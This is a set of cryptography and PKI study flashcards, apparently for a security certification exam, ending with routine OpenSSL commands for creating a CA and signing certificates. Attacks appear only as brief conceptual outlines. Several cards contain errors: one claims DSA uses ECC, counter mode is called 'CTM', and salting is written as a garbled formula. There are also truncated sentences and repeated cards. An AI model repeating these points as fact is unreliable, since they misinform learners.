A symmetric cipher is one in which encryption and decryption are both performed by the same secret key. The secret key is so-called because it must be kept secret. If the key is lost or stolen, the security is breached. Symmetric encryption is used for confidentiality.

 Symmetric encryption is more efficient for bulk encryption of large amounts of data for transfer. Symmetric encryption cannot be used for authentication or integrity, because both parties know the same key.
Term
asymmetric cipher
Definition

With an asymmetric cipher, operations are performed by two different but related public and private keys in a key pair. 

Each key is capable of reversing the operation of its pair. For example, if the public key is used to encrypt a message, only the paired private key can decrypt the ciphertext produced. The public key cannot be used to decrypt the ciphertext, even though it was used to encrypt it. 

 


The keys are linked in such a way as to make it impossible to derive one from the other. This means that the key holder can distribute the public key to anyone he or she wants to receive secure messages from. No one else can use the public key to decrypt the messages; only the linked private key can do that.

Asymmetric encryption can be used to prove identity. The holder of a private key cannot be impersonated by anyone else. The drawback of asymmetric encryption is that it involves substantial computing overhead compared to symmetric encryption. The message cannot 

Term
Asymmetric encryption 
is often referred to as public key cryptography.
Definition

A cipher that uses public and private keys. The keys are mathematically linked, using either Rivel, Shamir, Adleman (RSA) or elliptic curve cryptography (ECC) algorithms, but the private key is not derivable from the public one. An asymmetric key cannot reverse the operation it performs, so the public key cannot decrypt what it has encrypted, for example.

Asymmetric encryption is used for authentication, non-repudiation, and key agreement and exchange. Asymmetric encryption can be used to prove identity. Asymmetric encryption involves substantial computing overhead compared to symmetric encryption, so it is inefficient for large data transfers.

Term
RSA algorithm 
Definition

 

Named for its designers, Ronald Rivest, Adi Shamir, and Len Adelman, the first successful algorithm for public key encryption with a variable key length and block size.

 The RSA algorithm provides the mathematical properties for deriving key pairs and performing the encryption and decryption operations. This type of algorithm is called a trapdoor function, because it is easy to perform using the public key, but difficult to reverse without knowing the private key.

Term
Elliptic curve cryptography (ECC) 
Definition
Elliptic curve cryptography (ECC) is another type of trapdoor function that can be used in public key cryptography ciphers. The principal advantage of ECC over RSA's algorithm is that there are no known "shortcuts" to cracking the cipher or the math that underpins it, regardless of key length. Consequently, ECC used with a key size of 256 bits is very approximately comparable to RSA with a key size of 2048 bits. 
ECC depends on the discrete logarithm problem. 
Term
digital signature
Definition

 Public key cryptography can authenticate a sender, because they control a private key that encrypts messages in a way that no one else can. Public key cryptography can only be used with very small messages, however. Hashing proves integrity by computing a unique checksum from input. These two cryptographic functions can be combined to authenticate a sender and prove the integrity of a message, with a digital signature.

 
Term
The following process is used to create a digital signature using RSA encryption:
Definition

1.    Alice (the sender) creates a digest of a message, using a pre-agreed hash algorithm, and encrypts the digest using Alice’s private key. This creates Alice’s digital signature.

2.    Alice attaches the digital signature and sends both the message and public key to Bob (the receiver).

3.    Bob decrypts the digital signature using Alice's public key, resulting in the digest of the message.

 

4.    Bob then creates a digest of the message, using the same pre-agreed hash algorithm that Alice used. Bob compares both digests.
[image]

Term
Digital Signature Algorithm (DSA)  
Definition

The Digital Signature Algorithm (DSA) is a slightly different format for achieving the same sort of goal. DSA uses elliptic curve cryptography (ECC) rather than the RSA cipher.

Term
DIGITAL SIGNATURES 
Definition

 

It is important to remember that a digital signature is a hash that is then encrypted using a private key. Without the encryption, another party could easily intercept the file and the hash, modify the file and compute a new hash, and then send the modified file and hash to the recipient. It is also important to realize that the recipient must have some means of validating that the public key really was issued by Alice. Also note that digital signatures do not provide any message confidentiality.

Term

key exchange 

digital envelope

 

hybrid encryption

Definition

Symmetric encryption is the only practical means of encrypting and decrypting large amounts of data (bulk encryption), but it is difficult to distribute the secret key securely. Public key cryptography makes it easy to distribute a key, but can only be used efficiently with small amounts of data. Therefore, both are used within the same product in a type of key exchange system known as a digital envelope or hybrid encryption. A digital envelope allows the sender and recipient to exchange a symmetric encryption key securely by using public key cryptography

digital envelope- A digital envelope is a type of key exchange system that utilizes symmetric encryption for speed and asymmetric encryption for convenience and security.

 

Term

key exchange 

digital envelope

 

hybrid encryption 

Definition

1.    Alice obtains a copy of Bob's public key.

2.    Alice encrypts her message using a secret key cipher, such as AES. In this context, the secret key is referred to as a session key.

3.    Alice encrypts the session key with Bob's public key.

4.    Alice attaches the encrypted session key to the ciphertext message in a digital envelope and sends it to Bob. 

5.    Bob uses his private key to decrypt the session key.

Bob uses the session key to decrypt the ciphertext message.

[image]

Term
public key infrastructure (PKI). 
Definition

The process of issuing and verifying certificates is called public key infrastructure (PKI).

Term
erfect forward secrecy (PFS).
Diffie-Hellman (DH) key
Definition
This risk from RSA key exchange is mitigated by perfect forward secrecy (PFS). PFS uses Diffie-Hellman (DH) key agreement to create ephemeral session keys without using the server's private key. Diffie-Hellman allows Alice and Bob to derive the same shared secret just by agreeing some values that are all related by some trapdoor function. In the agreement process, they share some of them, but keep others private. Mallory cannot possibly learn the secret from the values that are exchanged publicly (en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange). The authenticity of the values sent by the server is proved by using a digital signature.
Term
perfect forward secrecy (PFS).
Diffie-Hellman (DH) key 
Definition
[image]
Term

cipher suite 

In a protocol such as Transport Layer Security (TLS), the requirements to both authenticate the identity of the server and to encrypt communications between the server and client need to be fulfilled by separate cryptographic products and cipher implementations. The combination of ciphers supported is referred to as a cipher suite. The server and client negotiate mutually compatible cipher suites as part of the TLS handshake.

Definition

So far, we have identified two parts of the cipher suite:

§  signature algorithm, used to assert the identity of the server's public key and facilitate authentication.

key exchange/agreement algorithm, used by the client and server to derive the same bulk encryption symmetric key.

The final part of a cipher suite determines the bulk encryption cipher. When AES is selected as the symmetric cipher, it has to be used in a mode of operation that supports a stream of network data.

Term
initialization vector (IV)
Definition
 A vector used in defining the starting point of a cryptographic process 
Term
Cipher Block Chaining (CBC) 
Definition

The Cipher Block Chaining (CBC) mode applies an initialization vector (IV) to the first plaintext block to ensure that the key produces a unique ciphertext from any given plaintext. The output of the first ciphertext block is then combined with the next plaintext block using an XOR operation. This process is repeated through the full "chain" of blocks, which (again) ensures that no plaintext block produces the same ciphertext. CBC needs to use padding to ensure that the data to encrypt is an exact multiple of the block size.

XOR is a logical operation that outputs 1 only when the inputs are 1 and 0.

Term
Counter mode (CTM) 
CTM mode allows block ciphers to behave like stream ciphers.
Definition

Counter mode (CTM) makes the AES algorithm work as a stream cipher. Counter mode applies an IV plus an incrementing counter value to the key to generate a keystream. The keystream is then XOR'ed to the data in the plaintext blocks. Each block can be processed individually and consequently in parallel, improving performance. Also, counter modes do not need to use padding. Any unused space in the last block is simply discarded.

Term
chosen ciphertext attack.
Definition

Symmetric algorithms do not provide message integrity or authentication. The basic CBC and counter modes of operation are unauthenticated. While a man-in-the-middle cannot decrypt them directly without the secret key, the ciphertexts are vulnerable to arbitrary data being inserted or modified to break the encryption scheme, referred to as a chosen ciphertext attack.

Term
 message authentication code (MAC)
Definition
Proving the integrity and authenticity of a message by combining its hash with a shared secret
Term

Authenticated Encryption with Additional Data (AEAD)

 

Definition

The weaknesses of CBC arising from the padding mechanism means that stream ciphers or counter modes are strongly preferred. These use Authenticated Encryption with Additional Data (AEAD) modes of operation. In an AEAD scheme, the associated data allows the receiver to use the message header to ensure the payload has not been replayed from a different communication stream.

 

An AEAD mode is identified by a single hyphenated function name, such as AES-GCM or AES-CCM. The ChaCha20-Poly1305 stream cipher has been developed as an alternative to AES.

 

Term

Authenticated Encryption

Definition

message authentication code (MAC) provides an authentication and integrity mechanism by hashing a combination of the message output and a shared secret key. The recipient can perform the same process using his or her copy of the secret key to verify the data. This type of authenticated encryption scheme is specified in a cipher suite as separate functions, such as "AES CBC with HMAC-SHA." Unfortunately, the implementation of this type of authenticated mode in AES CBC is vulnerable to a type of cryptographic attack called a padding oracle attack

Term
Non-repudiation 
Definition

Non-repudiation is linked to identification and authentication. It is the concept that the sender cannot deny sending the message. If the message has been encrypted in a way known only to the sender, it follows that the sender must have composed it. 

Term

Authentication and non-repudiation depend on the recipient not being able to encrypt the message, or the recipient would be able to impersonate the sender. This means that to support authentication and non-repudiation, recipients must be able to use the cryptographic process to decrypt authentication and integrity data, but not to encrypt it. This use case is supported by asymmetric encryption ciphers and public/private key pairs.

Definition
Term
File encryption 
Definition
the user is allocated an asymmetric cipher key pair. The private key is written to secure storage—often a trusted platform module (TPM)—and is only available when the user has authenticated to his or her account. The public key is used to encrypt a randomly generated AES cipher key. When the user tries to encrypt or decrypt files, the AES cipher key is decrypted using the private key to make it available for the encryption or decryption operation.
Term
Transport encryption 
Definition

§  this uses either digital envelopes or perfect forward secrecy. For HTTPS, a web server is allocated a key pair and stores the private key securely. The public key is distributed to clients via a digital certificate. The client and server use the key pair to exchange or agree on one or more AES cipher keys to use as session keys.  

Term
Obfuscation 
Definition
Obfuscation is the art of making a message difficult to understand.  . Cryptography is a very effective way of obfuscating a message by encrypting it.
Term
white box cryptography 
Definition
Attempts to protect an embedded key while preserving the functionality of the code—known as white box cryptography—have all been broken. There are no commercial solutions currently available to overcome this problem, but the subject is one of much research interest. 
Term
Speed
Definition
for symmetric ciphers and hash functions, speed is the amount of data per second that can be processed. Asymmetric ciphers are measured by operations per second. Speed has the most impact when large amounts of data are processed.
Term
Time/latency 
Definition
for some use cases, the time required to obtain a result is more important than a data rate. For example, when a secure protocol depends on ciphers in the handshake phase, no data transport can take place until the handshake is complete. This latency, measured in milliseconds, can be critical to performance.
Term
Size 
Definition
the security of a cipher is strongly related to the size of the key, with longer keys providing better security. Note that the key size cannot be used to make comparisons between algorithms. For example, a 256-bit ECC key is stronger than a 2048-bit RSA key. Larger keys will increase the computational overhead for each operation, reducing speed and increasing latency.
Term
Computational overheads 
Definition
in addition to key size selection, different ciphers have unique performance characteristics. Some ciphers require more CPU and memory resources than others, and are less suited to use in a resource-constrained environment.
Term
Low power devices 
Definition
some technologies or ciphers configured with longer keys require more processing cycles and memory space. This makes them slower and means they consume more power. Consequently, some algorithms and key strengths are unsuitable for handheld devices and embedded systems, especially those that work on battery power. Another example is a contactless smart card, where the card only receives power from the reader and has fairly limited storage capacity, which affects the maximum key size supported.
Term
Low latency uses 
Definition
this can impact protocol handshake setup times. A longer handshake will manifest as delay for the user, and could cause timeout issues with some applications. Also, if cryptography is deployed with a real time-sensitive channel, such as voice or video, the processing overhead on both the transmitter and receiver must be low enough not to impact the quality of the signal. 
Term
Entropy 
Definition
Entropy is a measure of disorder. 
Put another way, the ciphertext must exhibit a high level of entropy.
Term
true random number generator (TRNG)
pseudo RNG (PRNG)  
Definition

). A weak number generator leads to many published keys sharing a common factor. A cryptanalyst can test for the presence of these factors and derive the whole key much more easily. Consequently, the true random number generator (TRNG) or pseudo RNG (PRNG) module in the cryptographic implementation is critical to its strength.

Term
Predictability 
Definition
Predictability is a weakness in either the cipher operation or within particular key values that make a ciphertext lower entropy and vulnerable to cryptanalysis. 
Term
Nonce 
Definition
the principal characteristic of a nonce is that it is never reused ("number used once") within the same scope (that is, with the same key value). It could be a random or pseudo-random value, or it could be a counter value. 
Term
Initialization vector (IV) 
Definition
the principal characteristic of an IV is that it is random (or pseudo-random). There may also be a requirement that an IV not be reused (as with a nonce), but this is not the primary characteristic. 
Term
Salt 
Definition
this is also a random or pseudo-random number or string. The term salt is used specifically in conjunction with hashing password values. 
Term
longevity 
Definition
longevity is the consideration of how long data must be kept secure. 
In one sense, longevity is a measure of the confidence that people have in a given cipher. 
Term
. A man-in-the-middle (MITM) attack is typically focused on public key cryptography. 
Definition

1.    Mallory eavesdrops the channel between Alice and Bob and waits for Alice to request Bob's public key.

2.    Mallory intercepts the communication, retaining Bob's public key, and sends Mallory's public key to Alice.

3.    Alice uses Mallory's key to encrypt a message and sends it to Bob.

4.    Mallory intercepts the message and decrypts it using Mallory's private key.

 

5.    Mallory then encrypts a message (possibly changing it) with Bob's public key and sends it to Bob, leaving Alice and Bob oblivious to the fact that their communications have been compromised.

This attack is prevented by using secure authentication of public keys, such as associating the keys with certificates. This should ensure that Alice rejects Mallory's public key.

Term
downgrade attack 
Definition

downgrade attack can be used to facilitate a man-in-the-middle attack by requesting that the server use a lower specification protocol with weaker ciphers and key lengths. 

Term
Salting
Definition

Passwords stored as hashes are vulnerable to brute force and dictionary attacks. A password hash cannot be decrypted; hash functions are one-way. However, an attacker can generate hashes to try to find a match for password hash captured from network traffic or password file. A brute force attack simply runs through every possible combination of letters, numbers, and symbols. A dictionary attack creates hashes of common words and phrases.

Both these attacks can be slowed down by adding a salt value when creating the hash, so you compute:

(salt + password) * SHA = hash

 

The salt is not kept secret, because any system verifying the hash must know the value of the salt. It simply means that an attacker cannot use pre-computed tables of hashes. The hash values must be recompiled with the specific salt value for each password.

Term
Key stretching  
Password-Based Key Derivation Function 2 
(PBKDF2) 
Definition

Key stretching takes a key that's generated from a user password and repeatedly converts it to a longer and more random key. The initial key may be put through thousands of rounds of hashing. This might not be difficult for the attacker to replicate so it doesn't actually make the key stronger, but it slows the attack down, as the attacker has to do all this extra processing for each possible key value. Key stretching can be performed by using a particular software library to hash and save passwords when they are created. The Password-Based Key Derivation Function 2 (PBKDF2) is very widely used for this purpose, notably as part of Wi-Fi Protected Access (WPA).

Term
birthday attack 
Definition
birthday attack is a type of brute force attack aimed at exploiting collisions in hash functions. 
Term
collision 
Definition
collision is where a function produces the same hash value for two different plaintexts. 
Term
birthday attack 
collision is where a function produces the same hash value for two different plaintexts. 

This type of attack can be used to forge a digital signature. The attack works as follows:
Definition

1.    The attacker creates a malicious document and a benign document that produce the same hash value. The attacker submits the benign document for signing by the target.

 

2.    The attacker then removes the signature from the benign document and adds it to the malicious document, forging the target's signature.

Term
qubits 
superposition
Definition

A quantum computer performs processing on units called qubits (quantum bits). A qubit can be set to 0 or 1 or an indeterminate state called a superpositionwhere there is a probability of it being either 1 or 0. The likelihood can be balanced 50/50 or can be weighted either way. The power of quantum computing comes from the fact that qubits can be entangled. When the value of a qubit is read, it collapses to either 1 or 0, and all other entangled qubits collapse at the same time. The strength of this architecture is that a single operation can utilize huge numbers of state variables represented as qubits, while a classical computer's CPU must go through a read, execute, write cycle for each bit of memory. This makes quantum very well-suited to solving certain tasks, two of which are the factoring problem that underpins RSA encryption and the discrete logarithm problem that underpins ECC.

Term
cryptographic agility 
Definition

More generally, cryptographic agility refers to an organization's ability to update the specific algorithms used across a range of security products without affecting the business workflows that those products support.

Term

Lightweight Cryptography

Definition
Another problem affecting current cryptographic ciphers is use on low-power devices. NIST is hoping that a compact cipher suite will be developed that is both quantum resistant and that can run on battery-powered devices with minimal CPU and memory resources  
Term
Homomorphic encryption  
Definition

Homomorphic encryption is principally used to share privacy-sensitive data sets. When a company collects private data, it is responsible for keeping the data secure and respecting the privacy rights of individual data subjects. Companies often want to use third parties to perform analysis, however. Sharing unencrypted data in this scenario is a significant risk. Homomorphic encryption is a solution for this use case because it allows the receiving company to perform statistical calculations on fields within the data while keeping the data set as a whole encrypted. For example, if you want to perform analytics on customer interactions, an analysis tool will be able to sum logons without any account identifiers like email addresses ever being decrypted. 

Term
Blockchain 
Definition

Blockchain is a concept in which an expanding list of transactional records is secured using cryptography. Each record is referred to as a block and is run through a hash function. The hash value of the previous block in the chain is added to the hash calculation of the next block in the chain. This ensures that each successive block is cryptographically linked. Each block validates the hash of the previous block, all the way through to the beginning of the chain, ensuring that each historical transaction has not been tampered with. In addition, each block typically includes a timestamp of one or more transactions, as well as the data involved in the transactions themselves. 

The blockchain is recorded in a public ledger. This ledger does not exist as an individual file on a single computer; rather, one of the most important characteristics of a blockchain is that it is decentralized. The ledger is distributed across a peer-to-peer (P2P) network in order to mitigate the risks associated with having a single point of failure or compromise. Blockchain users can therefore trust each other equally. Likewise, another defining quality of a blockchain is its openness—everyone has the same ability to view every transaction on a blockchain. 

Term

 


BLOCKCHAIN 

Definition

Blockchain technology has a variety of potential applications. It can ensure the integrity and transparency of financial transactions, online voting systems, identity management systems, notarization, data storage, and more. However, blockchain is still an emerging technology, and outside of cryptocurrencies, has not yet been adopted on a wide-ranging scale.

Term
birthday attack 
collision is where a function produces the same hash value for two different plaintexts. 

This type of attack can be used to forge a digital signature. The attack works as follows:
Definition

1.    The attacker creates a malicious document and a benign document that produce the same hash value. The attacker submits the benign document for signing by the target.

 

2.    The attacker then removes the signature from the benign document and adds it to the malicious document, forging the target's signature.

Term
Quantum  
Definition

Quantum refers to computers that use properties of quantum mechanics to significantly out-perform classical computers at certain tasks.

Term
qubits  
Definition
A quantum computer performs processing on units called qubits (quantum bits). A qubit can be set to 0 or 1 or an indeterminate state called a superposition, where there is a probability of it being either 1 or 0.
Term
Post-quantum  
Definition

Post-quantum refers to the expected state of computing when quantum computers that can perform useful tasks are a reality. Currently, the physical properties of qubits and entanglement make quantum computers very hard to scale up. At the time of writing, the most powerful quantum computers have at most a few hundred qubits. A quantum computer will need about a million qubits to run useful applications.

Term
cryptographic agility  
Definition

More generally, cryptographic agility refers to an organization's ability to update the specific algorithms used across a range of security products without affecting the business workflows that those products support. 

Term
Homomorphic encryption  
Definition
Homomorphic encryption is principally used to share privacy-sensitive data sets.Homomorphic encryption is a solution for this use case because it allows the receiving company to perform statistical calculations on fields within the data while keeping the data set as a whole encrypted.
Term
Blockchain 
Definition

Blockchain is a concept in which an expanding list of transactional records is secured using cryptography. Each record is referred to as a block and is run through a hash function. The hash value of the previous block in the chain is added to the hash calculation of the next block in the chain. This ensures that each successive block is cryptographically linked. Each block validates the hash of the previous block, all the way through to the beginning of the chain, ensuring that each historical transaction has not been tampered with. In addition, each block typically includes a timestamp of one or more transactions, as well as the data involved in the transactions themselves. 

Term
Digital certificate
Definition

A digital certificate is an electronic document that associates credentials with a public key. This only involves asymmetric encryption.

 

Term
Digital evidence or Electronically Stored Information (ESI) 
Definition
Digital evidence or Electronically Stored Information (ESI) is evidence that cannot be seen with the naked eye; rather, it must be interpreted using a machine or process. There is no encryption involved.
Term
Security through obscurity
Definition

Security through obscurity involves keeping something a secret by hiding it, but not necessarily encrypting it. While this can fool the unwitting observer, it is easily detectable by those involved in cybersecurity and their tools.

 

Term
Security through obscurity
Definition

Security through obscurity involves keeping something a secret by hiding it, but not necessarily encrypting it. While this can fool the unwitting observer, it is easily detectable by those involved in cybersecurity and their tools.

 

Term

 

Which two cryptographic functions can be combined to authenticate a sender and prove the integrity of a message?

Definition
  1. Public key cryptography and hashing

     
Term
Public key infrastructure (PKI)  
Definition

 aims to prove that the owners of public keys are who they say they are. Under PKI, anyone issuing public keys should obtain a digital certificate. The validity of the certificate is guaranteed by a certificate authority (CA). The validity of the CA can be established using various models. 

 

Term
certificate authority (CA) 
Definition
The certificate authority (CA) is the entity responsible for issuing and guaranteeing certificates. 
Term
Third-party CA services include 
Definition
IdenTrust, Digicert, Sectigo/Comodo, GoDaddy, and GlobalSign. 
Term
The functions of a CA are as follows
Definition

§  Provide a range of certificate services useful to the community of users serviced by the CA.

§  Ensure the validity of certificates and the identity of those applying for them (registration).

§  Establish trust in the CA by users and government and regulatory authorities and enterprises, such as financial institutions.

§  Manage the servers (repositories) that store and administer the certificates.

 

§  Perform key and certificate lifecycle management, notably revoking invalid certificates.

Term
trust model 
Definition

The trust model is a critical PKI concept, and shows how users and different CAs are able to trust one another.

Term

Hierarchical (Intermediate CA)

Definition

In the hierarchical model, a single CA (called the root) issues certificates to several intermediate CAs. The intermediate CAs issue certificates to subjects (leaf or end entities). This model has the advantage that different intermediate CAs can be set up with different certificate policies, enabling users to perceive clearly what a particular certificate is designed for. Each leaf certificate can be traced back to the root CA along the certification path. This is also referred to as certificate chaining, or a chain of trust. The root's certificate is self-signed. In the hierarchical model, the root is still a single point of failure. If the root is damaged or compromised, the whole structure collapses. To mitigate against this, however, the root server can be taken offline, as most of the regular CA activities are handled by the intermediate CA servers.Another problem is that there is limited opportunity for cross-certification; that is, to trust the CA of another organization. Two organizations could agree to share a root CA, but this would lead to operational difficulties that could only increase as more organizations join. In practice, most clients are configured to trust multiple root CAs.

 

Term

Online versus Offline CAs

Definition

An online CA is one that is available to accept and process certificate signing requests, publish certificate revocation lists, and perform other certificate management tasks. Because of the high risk posed by compromising the root CA, a secure configuration involves making the root an offline CA. This means that it is disconnected from any network and usually kept in a powered-down state. The root CA will need to be brought online to add or update intermediate CAs.

Term
Registration 
Definition
Registration is the process by which end users create an account with the CA and become authorized to request certificates. The exact processes by which users are authorized and their identity proven are determined by the CA implementation
Term
certificate signing request (CSR)
registration authorities (RAs)
Definition

When a subject wants to obtain a certificate, it completes a certificate signing request (CSR) and submits it to the CA. The CSR is a Base64 ASCII file containing the information that the subject wants to use in the certificate, including its public key.

The CA reviews the certificate and checks that the information is valid. For a web server, this may simply mean verifying that the subject name and fully qualified domain name (FQDN) are identical, and verifying that the CSR was initiated by the person administratively responsible for the domain, as identified in the domain's WHOIS records. If the request is accepted, the CA signs the certificate and sends it to the subject.

 

The registration function may be delegated by the CA to one or more registration authorities (RAs). These entities complete identity checking and submit CSRs on behalf of end users, but they do not actually sign or issue certificates.

Term
digital certificate 
 Public Key Cryptography Standards (PKCS)
X.509 
Definition

A digital certificate is essentially a wrapper for a subject's public key. As well as the public key, it contains information about the subject and the certificate's issuer or guarantor. The certificate is digitally signed to prove that it was issued to the subject by a particular CA. The subject could be a human user (for certificates allowing the signing of messages, for instance) or a computer server (for a web server hosting confidential transactions, for instance).

Digital certificates are based on the X.509 standard approved by the International Telecommunications Union and standardized by the Internet Engineering Taskforce

 

The Public Key Infrastructure X.509 (PKIX) working group manages the development of these standards. RSA also created a set of standards, referred to as Public Key Cryptography Standards (PKCS), to promote the use of public key infrastructure.

Term
CERTIFICATE ATTRIBUTES
Definition

Field

Usage

Serial number

A number uniquely identifying the certificate within the domain of its CA. 

Signature algorithm

The algorithm used by the CA to sign the certificate.

Issuer

The name of the CA. 

Valid from/to

Date and time during which the certificate is valid.

Subject

The name of the certificate holder, expressed as a distinguished name (DN). Within this, the common name (CN) part should usually match either the fully qualified domain name (FQDN) of the server or a user email address.

Public key

Public key and algorithm used by the certificate holder.

Extensions

V3 certificates can be defined with extended attributes, such as friendly subject or issuer names, contact email addresses, and intended key usage. 

Subject alternative name (SAN)

This extension field is the preferred mechanism to specify additional host names for a single certificate.

Term
common name (CN) 
Definition

When certificates were first introduced, the common name (CN) attribute was used to identify the FQDN by which the server is accessed, such as www.comptia.org. This usage grew by custom rather than design, however. The CN attribute can contain different kinds of information, making it difficult for a browser to interpret it correctly. Consequently, the CN attribute is deprecated as a method of validating subject identity

Term
subject alternative name (SAN) 
Definition

The subject alternative name (SAN) extension field is structured to represent different types of identifiers, including domain names. If a certificate is configured with a SAN, the browser should validate that, and ignore the CN value. It is still safer to put the FQDN in the CN as well, because not all browsers and implementations stay up to date with the standards.

 


The SAN field also allows a certificate to represent different subdomains, such as 
www.comptia.org and members.comptia.org.

Term
Certificate policies 
Definition

Certificate policies define the different uses of certificate types issued by the CA. These can be configured as standard certificate templates.

Term
Extended Key Usage (EKU
Enhanced Key Usage
Definition

A certificate type is set by configuring the Key Usage attribute. The Extended Key Usage (EKU) field—referred to by Microsoft as Enhanced Key Usage—is a complementary means of defining usage. Typical values used include Server Authentication, Client Authentication, Code Signing, or Email Protection. The EKU field is more flexible than the Key Usage field, but problems can occur when nonstandard or vendor-specific definitions are used.

 


An extension can be tagged as critical, meaning that the application processing the certificate must be able to interpret the extension correctly; otherwise, the certificate should be rejected. In the case of a Key Usage extension marked as critical, an application should reject the certificate if it cannot resolve the Key Usage value. For example, this prevents a certificate issued for encrypting traffic sent to a web server from being used for signing an email message.

Term
server certificate 
Definition

server certificate guarantees the identity of e-commerce sites or any sort of website to which users submit data that should be kept confidential. 

Term
Domain Validation (DV)
Definition

proving the ownership of a particular domain. This may be proved by responding to an email to the authorized domain contact or by publishing a text record to the domain. This process can be highly vulnerable to compromise. 

Term
Extended Validation (EV) 
Definition

subjecting to a process that requires more rigorous checks on the subject's legal identity and control over the domain or software being signed. EV standards are maintained by the CA/Browser forum

 

§An EV certificate cannot be issued for a wildcard domain.

Term
code signing certificate 
Definition

code signing certificate is issued to a software publisher, following some sort of identity check and validation process by the CA. The publisher then signs the executables or DLLs that make up the program to guarantee the validity of a software application or browser plug-in. Some types of scripting environments, such as PowerShell, can also require valid digital signatures. The CN is set to an organization name, such as "CompTIA Development Services, LLC," rather than an FQDN

Term
 root certificate 
Definition

The root certificate is the one that identifies the CA itself. The root certificate is self-signed. A root certificate would normally use a key size of at least 2048 bits. Many providers are switching to 4096 bits. The CN for a root certificate is set to the organization/CA name, such as "CompTIA Root CA," rather than an FQDN.

Term
self-signed certificate.
Definition

Any machine, web server, or program code can be deployed with a self-signed certificate. Self-signed certificates will be marked as untrusted by the operating system or browser, but an administrative user can choose to override this.

Term
Key management  
Definition
Key management refers to operational considerations for the various stages in a key's life cycle. 
Term
A key's life cycle may involve the following stages:
Definition

§  Key generation—creating a secure key pair of the required strength, using the chosen cipher.

§  Certificate generation—to identify the public part of a key pair as belonging to a subject (user or computer), the subject submits it for signing by the CA as a digital certificate with the appropriate key usage. At this point, it is critical to verify the identity of the subject requesting the certificate and only issue it if the subject passes identity checks.

§  Storage—the user must take steps to store the private key securely, ensuring that unauthorized access and use is prevented. It is also important to ensure that the private key is not lost or damaged.

§  Revocation—if a private key is compromised, the key pair can be revoked to prevent users from trusting the public key.

 

§  Expiration and renewal—a certificate key pair that has not been revoked expires after a certain period. Giving the key or certificate a "shelf-life" increases security. Certificates can be renewed with new key material.

Term
M-of-N control 
Definition

 

, meaning that of N number of administrators permitted to access the system, M must be present for access to be granted. M must be greater than 1, and N must be greater than M. For example, when M = 2 and N = 4, any two of four administrators must be present. Staff authorized to perform key management must be carefully vetted, and due care should be taken if these employees leave the business.

Term
Escrow 
Definition

Escrow means that something is held independently. In terms of key management, this refers to archiving a key (or keys) with a third party. This is a useful solution for organizations that don't have the capability to store keys securely themselves, but it invests a great deal of trust in the third party.

Term
certificate revocation list 
Definition

A CRL has the following attributes:

§  Publish period—the date and time on which the CRL is published. Most CAs are set up to publish the CRL automatically.

§  Distribution point(s)—the location(s) to which the CRL is published.

§  Validity period—the period during which the CRL is considered authoritative. This is usually a bit longer than the publish period (for example, if the publish period was every 24 hours, the validity period might be 25 hours).

 

§  Signature—the CRL is signed by the CA to verify its authenticity.

Term
Online Certificate Status Protocol (OCSP) 
Definition

 

Another means of providing up-to-date information is to check the certificate's status on an Online Certificate Status Protocol (OCSP) server, referred to as an OCSP responder. Rather than return a whole CRL, this just communicates the status of the requested certificate. Details of the OCSP responder service should be published in the certificate.

OCSP stapling resolves these issues by having the SSL/TLS web server periodically obtain a time-stamped OCSP response from the CA. When a client submits an OCSP request, the web server returns the time-stamped response, rather than making the client contact the OCSP responder itself.

Term
Pinning 
Definition

 

Pinning refers to several techniques to ensure that when a client inspects the certificate presented by a server or a code-signed application, it is inspecting the proper certificate. This might be achieved by embedding the certificate data in the application code, or by submitting one or more public keys to an HTTP browser via an HTTP header, which is referred to as HTTP Public Key Pinning (HPKP).

HPKP has serious vulnerabilities and has been deprecated

 

The replacement mechanism is the Certificate Transparency Framework.

Term

 Distinguished Encoding Rules (DER)

 

×
 

The binary format used to structure the information in a digital certificate.

Definition
The binary format  used to structure the information in a digital certificate.
Term
Privacy-enhanced Electronic Mail (PEM) 
Definition
Base64 encoding scheme used to store certificate and key data as ASCII text.  More typically, the binary data is represented as ASCII text characters using Base64 Privacy-enhanced Electronic Mail (PEM) encoding. ASCII-format data has descriptive headers, such as the "BEGIN CERTIFICATE" string.
Term
PKCS #12 format 
Definition

§  The PKCS #12 format allows the export of the private key with the certificate. This would be used either to transfer a private key to a host that could not generate its own keys, or to back up/archive a private key. This type of file format is usually password-protected and always binary. On Windows, these usually have a .PFX extension, while MacOS and iOS use .P12. In Linux, the certificate and key are usually stored in separate files.

Term
P7B format PKCS #7
Definition

§  The P7B format implements PKCS #7, which is a means of bundling multiple certificates in the same file. It is typically in ASCII format. This is most often used to deliver a chain of certificates that must be trusted by the processing host. It is associated with the use of S/MIME to encrypt email messages. P7B files do not contain the private key. In Linux, the .PEM extension is very widely used for certificate chains.

Term

In a Windows environment, certificate infrastructure is installed and managed as Active Directory Certificate Services. There is a certutil tool for command line management, or you can use PowerShell.

Definition
Term

For Linux, CA services are typically implemented using the OpenSSL suite (openssl.org). The following represent a few of the many operations that can be accomplished using openssl commands.

Definition
Term

Root CA

 

To configure a root CA in OpenSSL, set up a directory structure and adapt an OpenSSL configuration file (openssl.cnf) for any site-local settings. You then need to create an RSA key pair:

Definition

openssl genrsa -aes256 -out cakey.pem 4096

Term

The -aes256 argument encrypts the key and requires a password to make use of it. The 4096 argument sets the key length. The output file data is in PEM ASCII format by default. Some sites prefer a naming convention, such as ca.key.

 

The next step is to use this RSA key pair to generate a self-signed root X.509 digital certificate:

Definition
openssl req -config openssl.cnf -key cakey.pem -new -x509 -days 7300 -sha256 -out cacert.pem
Term

Certificate Signing Requests

To configure a certificate on a host, create a certificate signing request (CSR) with a new key pair. This command is run on the web server:

Definition

openssl req -nodes -new -newkey rsa:2048 -out www.csr -keyout www.key

Having run the command, you then complete the prompts to enter the subject information for the certificate, taking care to match the common name (CN) to the FQDN by which clients access the server. This key is created without a password, which would have to be input at any restart of the web server application. We can rely on general access control security measures to protect the key.

Term

This CSR file must then be transmitted to the CA server. On the CA, run the following command to sign the CSR and output the X.509 certificate:

Definition

openssl ca -config openssl.cnf -extensions webserver -infiles www.csr -out www.pem

Term

The passphrase must be entered to confirm use of the cakey.pem private key. The -extensions argument selects an area of the configuration file for a particular certificate type. This sets the key usage attribute, plus any other extended attributes that are needed.

 


You can view the new certificate to check the details using the following two commands:

Definition

openssl x509 -noout -text -in www.pem

 


openssl verify -verbose -cafile cacert.pem www.pem

Transmit the www.pem file to the web server and update the server configuration to use it and the www.key private key.

Term

Key and Certificate Management 

 

You might export a copy of the private key from this server to be held in escrow as a backup. For this usage, you must password-protect the key:

Definition

openssl rsa -aes256 -in www.key -out www.key.bak

